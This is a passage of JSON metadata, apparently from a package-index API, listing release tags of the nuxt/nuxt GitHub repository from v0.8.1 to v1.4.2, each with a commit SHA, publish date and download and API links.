3a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/a